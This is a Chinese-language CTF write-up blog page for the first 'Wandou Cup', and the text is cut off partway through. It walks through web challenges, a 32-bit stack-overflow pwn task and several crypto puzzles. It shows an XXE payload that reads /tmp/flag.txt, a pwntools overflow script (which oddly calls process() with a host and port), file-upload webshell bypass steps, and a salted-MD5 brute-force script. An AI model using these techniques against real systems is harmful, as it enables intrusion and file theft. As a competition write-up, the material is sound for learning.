<!DOCTYPE html>
<html lang="">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="John Doe">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="John Doe">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>首届豌豆杯WriteUp · SuperY4Ng&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/favicon.ico" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >SuperY4Ng&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">首届豌豆杯WriteUp</a>
            </div>
    </div>
    
    <a class="home-link" href=/>SuperY4Ng's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            首届豌豆杯WriteUp
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "CTF">CTF</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">3.4k</span>阅读时长: <span class="post-count reading-time">13 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/10/29</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">PS：https://blog.csdn.net/Super_Yiang/article/details/83506186</span></span><br></pre></td></tr></table></figure>
<p>由于比赛结束服务器关闭，所以赛后无法实现复现，造成writeup的可读性不强勿怪。</p>
<h3 id="WEB安全"><a href="#WEB安全" class="headerlink" title="WEB安全"></a>WEB安全</h3><h4 id="1-web签到题（100）"><a href="#1-web签到题（100）" class="headerlink" title="1.web签到题（100）"></a>1.web签到题（100）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:请选手访问 http://101.231.137.47:20001/，获取flag。</span><br></pre></td></tr></table></figure>
<p>很明显链接点进去，滑稽，很多很多滑稽，既然是签到题，先F12查看页面源代码即可找到flag。</p>
<h4 id="2-输入密码查看flag（100）"><a href="#2-输入密码查看flag（100）" class="headerlink" title="2.输入密码查看flag（100）"></a>2.输入密码查看flag（100）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:请选手访问 http://101.231.137.47:20002/4.php ,输入密码就可查看flag哦。</span><br></pre></td></tr></table></figure>
<p>访问网址，进去是一个登录界面，需要输入查看密码才能查看，然后输入密码的下方有提示说密码是五位数，既然是五位数，尝试用burpsuite抓包进行爆破咯。设置payload</p>
<p><img src="https://i.loli.net/2018/10/29/5bd65d24e09a3.png" alt=""></p>
<p>爆破即可得到密码：<code>12138</code>（没记错的话）登录进去就可以得到flag。</p>
<h4 id="3-这真能传马？（100）"><a href="#3-这真能传马？（100）" class="headerlink" title="3.这真能传马？（100）"></a>3.这真能传马？（100）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:小明这个大黑客这两天在做坏事想请您帮忙，请选手访问 http://101.231.137.47:20003 ，看看能不能传个马获取/opt/flag.txt中内容呢？flag为32位小写md5。</span><br></pre></td></tr></table></figure>
<p>点进链接，发现是一个上传文件的页面，上面写着<code>Upload yourPhotos to Dir</code>猜测是对上传的文件类型进行的限制只能传图片。然后尝试着上传一个图片然后抓包试试，发现它POST了一个参数，值是图片的后缀名（例如jpg，gif等），我再尝试着上传一个大马.jpg，抓包改文件名为.php并在那个参数后面加上php的后缀，就可以成功上传，然后就简单了，直接去<code>/opt/flag.txt</code>拿flag。</p>
<h4 id="4-这真的能注入？（100）"><a href="#4-这真的能注入？（100）" class="headerlink" title="4.这真的能注入？（100）"></a>4.这真的能注入？（100）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:小明这个大黑客这两天在做坏事想请您帮忙，请选手访问 http://101.231.137.47:20004 ，通过某种奇怪的Web攻击技术获取数据库中的flag值。flag为32位小写md5。</span><br></pre></td></tr></table></figure>
<p>点击链接，发现是一个表，url里有一个gid的参数，尝试着改参数的值，表的内容也会发生变化，外加题目就提示注入，直接sqlmap跑起来，爆库，爆表，爆列名，dump下来直接get到flag。</p>
<h4 id="5-怎么拿webshell（200）"><a href="#5-怎么拿webshell（200）" class="headerlink" title="5.怎么拿webshell（200）"></a>5.怎么拿webshell（200）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:公司好像有个服务器被黑了，攻击者关闭了远程登录，请选手访问 http://101.231.137.47:20005 ，看看能不能拿到webshell获取/opt/flag.txt中内容呢？flag为32位小写md5。</span><br></pre></td></tr></table></figure>
<p>题目说服务器被黑了，攻击者关闭了远程登录，扫描工具扫到有一个/hack.php的页面，是个登录页面，尝试burpsuite字典爆破，密码：<code>1qaz2wsx</code> ，登入发现是个可以读取文件内容的页面，直接去/opt/flag.txt获取flag。</p>
<h4 id="6-APi（200）"><a href="#6-APi（200）" class="headerlink" title="6.APi（200）"></a>6.APi（200）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:这里好像有个什么api，链接在此http://10.10.10.199:20006/index ，能用它获取/tmp/flag.txt中内容吗？Flag包含大小写和符号噢</span><br></pre></td></tr></table></figure>
<p>api调用，点击链接，查看源码，尝试着输入一个值然后抓包，发现它并没有将我输入的内容发送到服务器，而是发送了几个特定的值。猜测是XXE漏洞（xxe也就是xml外部实体注入 ）读取flag.txt。因为它是以json格式传递，所以我先将<code>Content-Type</code>的值为<code>application/xml</code>，然后我恶意的引用了外部实体，将它的值绑定为服务器的<code>/tmp/flag.txt</code>，这样在服务器返回给我们解析后的值时，就会把<code>/tmp/flag.txt</code>的内容返回给我们。</p>
<p>XML内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE a[</span><br><span class="line">&lt;!ENTITY b SYSTEM &quot;file:///tmp/flag.txt&quot;&gt;]&gt;</span><br><span class="line">&lt;c&gt;&amp;b;&lt;/c&gt;</span><br></pre></td></tr></table></figure>
<h4 id="8-Atom-附加题-100"><a href="#8-Atom-附加题-100" class="headerlink" title="8.Atom[附加题] (100)"></a>8.Atom[附加题] (100)</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">hint:您觉得这个网站华丽吗？或许您可以获权搞点新鲜的~</span><br><span class="line">地址：http://101.231.137.47:20008/login.php</span><br><span class="line">账户:test，密码:123456</span><br></pre></td></tr></table></figure>
<p>这个附加题给的是一个登录页面，题目说获权，猜测是要以admin的身份登录，抓包，发现cookie中有一个<code>admin</code>的参数值为0，改成1就可以查看页面源码找到flag。</p>
<h3 id="远程漏洞利用"><a href="#远程漏洞利用" class="headerlink" title="远程漏洞利用"></a>远程漏洞利用</h3><h4 id="2-远程攻击-2（100）"><a href="#2-远程攻击-2（100）" class="headerlink" title="2.远程攻击-2（100）"></a>2.远程攻击-2（100）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hint:请选手下载文件100，通过某种攻击技术获取flag文件中的内容。IP:101.231.137.47,端口：20011。</span><br><span class="line">下载地址：</span><br></pre></td></tr></table></figure>
<p>先file命令看看</p>
<p>100: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=7d83faff7b0a4f6c760446a51f736a4cb63ffe69, not stripped</p>
<p><strong>GDB走一波</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">CANARY    : disabled</span><br><span class="line">FORTIFY   : disabled</span><br><span class="line">NX        : ENABLED</span><br><span class="line">PIE       : disabled</span><br><span class="line">RELRO     : Partial</span><br></pre></td></tr></table></figure>
<p>然后IDA看看</p>
<p><img src="https://i.loli.net/2018/10/29/5bd6a9f8e6b3c.png" alt=""></p>
<p><img src="https://i.loli.net/2018/10/29/5bd6aa7ca82ba.png" alt=""></p>
<p><img src="https://i.loli.net/2018/10/29/5bd6aa31b10f2.png" alt=""></p>
<p>比较初级的栈溢出了</p>
<p><img src="https://i.loli.net/2018/10/29/5bd6aaff9d2b2.png" alt=""></p>
<p>起始地址为<strong>0xffffd140</strong>   ret的地址为<strong>0xffffd18c</strong></p>
<p><img src="https://i.loli.net/2018/10/29/5bd6abd493a0c.png" alt=""></p>
<p>所以只要输入76个字符，然后附上readflag函数的地址即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">p = process(&quot;101.231.137.47&quot;,20011)</span><br><span class="line">payload = &apos;m&apos;*76 + p32(0x8048471)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="加密解密"><a href="#加密解密" class="headerlink" title="加密解密"></a>加密解密</h3><h4 id="1-我这密码忘了。。。（100）"><a href="#1-我这密码忘了。。。（100）" class="headerlink" title="1.我这密码忘了。。。（100）"></a>1.我这密码忘了。。。（100）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hint:小明记性不好这密码忘了，只记得密码和下面这串字符是有关系的，请选手分析下列字符串帮助小明找回密码。VTBzNE9GZEhURWhDVjBveFVrMVVTell4UkRKWU5FTTFRMGszUmtrd1ZFVT0=</span><br><span class="line">Flag为32位大写md5</span><br></pre></td></tr></table></figure>
<p>题目给了一串base64,解码得<code>U0s4OFdHTEhCV0oxUk1USzYxRDJYNEM1Q0k3RkkwVEU=</code>发现还是base64，再解密就可以得到flag：<code>SK88WGLHBWJ1RMTK61D2X4C5CI7FI0TE</code>。</p>
<h4 id="2-二战时期的密码（100）"><a href="#2-二战时期的密码（100）" class="headerlink" title="2.二战时期的密码（100）"></a>2.二战时期的密码（100）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:已知将一个flag以一种加密形式为使用密钥进行加密，使用密钥WELCOMETOCFF加密后密文为000000000000000000000000000000000000000000000000000101110000110001000000101000000001，请分析出flag。Flag为12位大写字母</span><br></pre></td></tr></table></figure>
<p>给了一个长度为84位的二进制数，并给了秘钥<code>WELCOMETOCFF</code>长度是12，所以猜测是ascii的二进制值七位异或</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">秘钥                   密文           明文</span><br><span class="line">W=0010111            0000000        0010111=W</span><br><span class="line">E=0000101            0000000        0000101=E</span><br><span class="line">L=0001100            0000000        0001100=L</span><br><span class="line">C=0000011            0000000        0000011=C</span><br><span class="line">O=0001111            0000000        0001111=O</span><br><span class="line">M=0001101            0000000        0001101=M</span><br><span class="line">E=0000101            0000000        0000101=E</span><br><span class="line">T=0010100            0010111        0000011=C</span><br><span class="line">O=0001111            0000110        0001001=I</span><br><span class="line">C=0000011            0010000        0010011=S</span><br><span class="line">F=0000110            0010100        0010010=R</span><br><span class="line">F=0000110            0000001        0000111=G</span><br></pre></td></tr></table></figure>
<p>就可以获得flag了。</p>
<h4 id="3-被黑了，求密码（100）"><a href="#3-被黑了，求密码（100）" class="headerlink" title="3.被黑了，求密码（100）"></a>3.被黑了，求密码（100）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:小明记性不好这密码忘了，只记得密码和下面这串字符是有关系的  .--- .-. --.- ----- ..... ---.. -..- -- --. -.-. .---- .. --... .--. -... ....- ..- -. --. .- --... -... .-.. -. -... -.-. -- ... -.... -.-- .--- ----- 请选手分析下列字符串帮助小明找回密码。Flag为32位大写md5</span><br></pre></td></tr></table></figure>
<p>有<code>-</code>和<code>.</code>组成的很明显就是摩斯密码，摩斯密码解码</p>
<p><img src="https://i.loli.net/2018/10/29/5bd66e627f319.png" alt=""></p>
<p>然后大写就可以：<code>JRQ058XMGC1I7PB4UNGA7BLNBCMS6YJ0</code></p>
<h4 id="4-出航了-出航了！！（200）"><a href="#4-出航了-出航了！！（200）" class="headerlink" title="4.出航了~出航了！！（200）"></a>4.出航了~出航了！！（200）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:Hey! 各位船员们抓紧时间上船吧，我们的船马上就要开了。在出发前我会给你们一个指导手册（data.pcap），指导手册里会有你们在本次航行中需要的通行证。我在这里啰嗦一下：大家可以利用通行证里的request（请求）信息进行分析。祝各位能在旅途中获得本次flag!</span><br></pre></td></tr></table></figure>
<p>给了一个数据包，提示利用<code>request</code>(请求)分析，用wireshark过滤器过滤<code>http.request.method==&quot;POST&quot;</code>就可以看到只有一个包，点击查看发现是用户名和密码</p>
<p><img src="https://i.loli.net/2018/10/29/5bd66f682ab14.png" alt=""></p>
<p>将密码base64解密得flag：<code>KN1Z6PXVy9</code></p>
<p><img src="C:\Users\LE201A~1\AppData\Local\Temp\1540779982838.png" alt="1540779982838"></p>
<h4 id="5-IDC密码破解（200）"><a href="#5-IDC密码破解（200）" class="headerlink" title="5.IDC密码破解（200）"></a>5.IDC密码破解（200）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:小明是某互联网企业的一名IDC管理员，由于该企业的业务复杂,机器众多,为了方便日常的管理工作,小明使用一种加密算法来加密密码然后放在一个excel中,方便日常的工作,.现在从小明的excel中抽取一条密码.请参赛选手下载压缩包 passwd-300.rar，破解压缩包中txt文档的加密密码并提交。</span><br></pre></td></tr></table></figure>
<p>给了一个txt文本，里面是<img src="https://i.loli.net/2018/10/29/5bd6701c18712.png" alt=""></p>
<p>纯脑洞，js反过来就是sj（手机），然后手机拼音9键，<code>4163633181327481</code>，例如41就是第四个按键的第一个字母g等，然后flag就出来啦。</p>
<h4 id="6-超级密码（300）"><a href="#6-超级密码（300）" class="headerlink" title="6.超级密码（300）"></a>6.超级密码（300）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hint:某遗留系统采用固定格式+6-10位数字类型密码，今天他们发生了数据泄露事件，做为一名黑客，你要开始干活了。</span><br><span class="line">请下载附件password进行破解。</span><br></pre></td></tr></table></figure>
<p>下载了附件用notepad++打开发现好多的md5值和字符串，所以猜测就是hash加密并为密码加盐了（Salt）。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">即便是将原始密码加密后的哈希值存储在数据库中依然是不够安全的，因为可以通过查表法破解hash值。那么有什么好的办法来解决这个问题呢？答案是加盐。</span><br><span class="line">盐（Salt）是什么？就是一个随机生成的字符串。我们将盐与原始密码连接（concat）在一起（放在前面或后面都可以），然后将concat后的字符串加密。采用这种方式加密密码，查表法就不灵了（因为盐是随机生成的）</span><br></pre></td></tr></table></figure>
<p>直接放脚本爆破</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line">result =<span class="string">"&#123;FLAG:%number&#125;%salt"</span></span><br><span class="line">password =[<span class="string">"f09ebdb2bb9f5eb4fbd12aad96e1e929.p5Zg6LtD"</span>,<span class="string">"6cea25448314ddb70d98708553fc0928.ZwbWnG0j"</span>,<span class="string">"2629906b029983a7c524114c2dd9cc36.1JE25XOn"</span>,<span class="string">"2e854eb55586dc58e6758cfed62dd865.ICKTxe5j"</span>,<span class="string">"7b073411ee21fcaf177972c1a644f403.0wdRCo1W"</span>,<span class="string">"6795d1be7c63f30935273d9eb32c73e3.EuMN5GaH"</span>,<span class="string">"d10f5340214309e3cfc00bbc7a2fa718.aOrND9AB"</span>,<span class="string">"8e0dc02301debcc965ee04c7f5b5188b.uQg6JMcx"</span>,<span class="string">"4fec71840818d02f0603440466a892c9.XY5QnHmU"</span>,<span class="string">"ee8f46142f3b5d973a01079f7b47e81c.zMVNlHOr"</span>,<span class="string">"e4d9e1e85f3880aedb7264054acd1896.TqRhn1Yp"</span>,<span class="string">"0fd046d8ecddefc66203f6539cac486b.AR5lI2He"</span>,<span class="string">"f6326f02adaa31a66ed06ceab2948d01.Aax2fIPl"</span>,<span class="string">"720ba10d446a337d79f1da8926835a49.ZAOYDPR2"</span>,<span class="string">"06af8bcc454229fe5ca09567a9071e62.hvcECKYs"</span>,<span class="string">"79f58ca7a81ae2775c2c2b73beff8644.TgFacoR3"</span>,<span class="string">"46aaa5a7fef5e250a2448a8d1257e9cf.GLYu0NO4"</span>,<span class="string">"2149ac87790dd0fe1b43f40d527e425a.5Xk2O1sG"</span>,<span class="string">"d15a36d8be574ac8fe64689c728c268e.aZikhUEy"</span>,<span class="string">"ff7bced91bd9067834e3ad14cc1464cd.E7UROqXn"</span>,<span class="string">"8cc0437187caf10e5eda345cb6296252.XPin3mVB"</span>,<span class="string">"5cfcdca4a9cb2985a0b688406617689e.nsGqoafv"</span>,<span class="string">"5a7dfa8bc7b5dfbb914c0a78ab2760c6.YC1qZUFR"</span>,<span class="string">"8061d8f222167fcc66569f6261ddd3cc.wNgQi615"</span>,<span class="string">"3d8a02528c949df7405f0b48afe4a626.CO2NMusb"</span>,<span class="string">"70651acbc8bd027529bbcccdbf3b0f14.CAXVjFMd"</span>,<span class="string">"a9dbe70e83596f2d9210970236bdd535.TL6sjEuK"</span>,<span class="string">"9ed6ef5780f705ade6845b9ef349eb8f.tJ90ibsz"</span>,<span class="string">"4b46fac0c41b0c6244523612a6c7ac4a.VTjOSNmw"</span>,<span class="string">"8141e6ecb4f803426d1db8fbeb5686ef.lh75cdNC"</span>,<span class="string">"df803949fd13f5f7d7dd8457a673104b.V39sEvYX"</span>,<span class="string">"19052cc5ef69f90094753c2b3bbcd41d.YwoGExpg"</span>,<span class="string">"cf8591bdccfaa0cdca652f1d31dbd70f.pJCLui49"</span>,<span class="string">"66e10e3d4a788c335282f42b92c760a1.NQCZoIhj"</span>,<span class="string">"94c3ae5bcc04c38053106916f9b99bda.vOktelLQ"</span>,<span class="string">"e67e88646758e465697c15b1ef164a8d.x0hwJGHj"</span>,<span class="string">"84d3d828e1a0c14b5b095bedc23269fb.2HVWe9fM"</span>,<span class="string">"264a9e831c3401c38021ba3844479c3f.Cx4og6IW"</span>,<span class="string">"ed0343dec184d9d2c30a9b9c1c308356.g2rqmPkT"</span>,<span class="string">"ad5ba8dc801c37037350578630783d80.pFK2JDT5"</span>,<span class="string">"3f588bedb704da9448e68fe81e42bca6.4ANDOiau"</span>,<span class="string">"970c9cf3cad3dfa7926f53ccaae89421.R6ML7Qy8"</span>,<span class="string">"e0a097b7cceaa7a8949fe039884e4a2d.dul2ynqL"</span>,<span class="string">"7df505218102c64b1fe4fa5981ddb6fa.jPeoyS57"</span>,<span class="string">"fd4f6043da1f7d5dca993c946ef6cd7c.6p9CwGaY"</span>,<span class="string">"5fe6d99b9a2824949279187c246c9c30.OGQ2J57y"</span>,<span class="string">"135b150ad513a961089bb1c05085a3d9.h0dw1Fro"</span>,<span 